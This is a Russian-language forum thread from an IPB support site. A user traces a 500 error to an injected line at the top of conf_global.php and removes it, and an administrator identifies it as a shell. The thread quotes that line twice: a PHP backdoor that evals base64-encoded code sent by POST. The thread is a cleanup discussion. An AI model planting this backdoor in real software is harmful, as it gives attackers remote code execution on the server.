Перейти к содержимому


Фотография
- - - - -

Ошибка 500


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 4

#1 Оффлайн   Maxopka

    Новичок


  • Пользователи
  • Репутация
    0
    • Cообщений: 3
    • Форум:3.3.х
    • Город:Днепропетровск

Отправлено 14 Март 2013 - 01:27

Сегодня столкнулся с подобной ошибкой.

Поиск юзал, ответа не нашел.

Форум работал в течении 3-х месяцев без перебоев.

С чем это может быть связано?

Файл .htaccess удалил в первую очередь.


  • 0

Заработок и обучение заработку

#2 Онлайн   ..ツ⋆WOLF⋆ツ..

    Гуру


  • Модераторы
  • Репутация
    1 799
    • Cообщений: 8 169
    • Форум:3.4.х
    • Город:Казань

Отправлено 14 Март 2013 - 01:33

Сегодня столкнулся с подобной ошибкой.

Поиск юзал, ответа не нашел.

Форум работал в течении 3-х месяцев без перебоев.

С чем это может быть связано?

Файл .htaccess удалил в первую очередь.

для начал может поиском воспользуетесь и вобъете в поиск название вашей темы???


  • 0

#3 Оффлайн   Maxopka

    Новичок


  • Пользователи
  • Репутация
    0
    • Cообщений: 3
    • Форум:3.3.х
    • Город:Днепропетровск

Отправлено 14 Март 2013 - 02:04

Поиск использовал решения не нашел.

Увидел подобную тему, но решения там нет.


  • 0

#4 Оффлайн   Maxopka

    Новичок


  • Пользователи
  • Репутация
    0
    • Cообщений: 3
    • Форум:3.3.х
    • Город:Днепропетровск

Отправлено 14 Март 2013 - 19:23

Решил проблему.

Файл conf_global.php

 

<?php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}

$INFO['sql_driver']            =    'mysql';
$INFO['sql_host']            =    'localhost';
$INFO['sql_database']            =    'forum';

Вот так начинался.

 

Сделал вот так и все нормально.

<?php 

$INFO['sql_driver']            =    'mysql';
$INFO['sql_host']            =    'localhost';
$INFO['sql_database']            =    'forum';

  • 0

#5 Оффлайн   ๖ۣۣۜDesperate™

    Администратор


  • Администраторы
  • Репутация
    4 611
    • Cообщений: 8 556
    • Форум:3.4.х
    • Город:IpbZona
    Участник

Отправлено 14 Март 2013 - 20:21

Уважаемый

<?php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}

 

У вас полон дом шеллов и вредоносных кодов. Используйте данный раздел по безопасности ipb для ознакомления и исправления данной беды.


  • 0